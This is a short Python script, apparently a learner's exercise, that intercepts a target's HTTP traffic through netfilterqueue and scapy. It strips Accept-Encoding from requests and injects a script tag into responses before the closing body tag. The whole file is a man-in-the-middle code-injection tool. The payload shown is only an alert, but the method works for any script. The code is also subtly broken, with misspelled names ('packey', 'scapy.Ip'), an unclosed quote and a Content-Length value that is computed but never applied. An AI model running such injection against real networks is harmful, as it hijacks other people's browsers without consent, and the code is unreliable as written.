#!usr/bin/env python

#Here we are trying to capture the data from the target client and tries to inject the code. 

import netfilterqueue
import scapy.all as scapy
import re

 

def set_load(packet,load):

    packet[scapy.Raw].load=load
    del packet[scapy.Ip].len
    del packet[scapy.Ip].chksum
    del packey[scapy.TCP].chksum
    
    return packet


def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())   #converting into scapy packet
    if scapy_packet.haslayer(scapy.Raw):   #checking for HTTP layer

       if scapy_packet[scapy.TCP].dport == 80:  #HTTP requests
          
          print("[+]requests")
          modified_load = re.sub("Accept-encoding=.*?\\r\\n"," ",scapy_packet[scapy.Raw].load)
          new_packet = set_load(scapy_packet,modified_load)
          packet.set_payload(str(new_packet))

       elif scapy_packet[scapy.TCP].sport == 80:   #HTTP responses
          print("[+]responses")
          injection_code = "<script>alert('test)</script>"
          modified_load = scapy_packet[scapy.Raw].load.replace("</body",injection_code + "</body>")
          content_length_search = re.search("(?:Content-Length:\s)(\d*)",scapy_packet[scapy.Raw].load)

          if content_length_search:
             content_length = content_length_search.group(1)
             new_content_length = int(content_length)+len(injection_code)
             print(content_length)

          new_packet = set_load(scapy_packet,modified_load)
          packet.set_payload(str(new_packet))


    packet.accept()  #to forward the packets

queue = netfilterqueue.NetfilterQueue()  #creating an instance of queue
queue.bind(0,process_packet)  #binding the queue and call back function
queue.run()
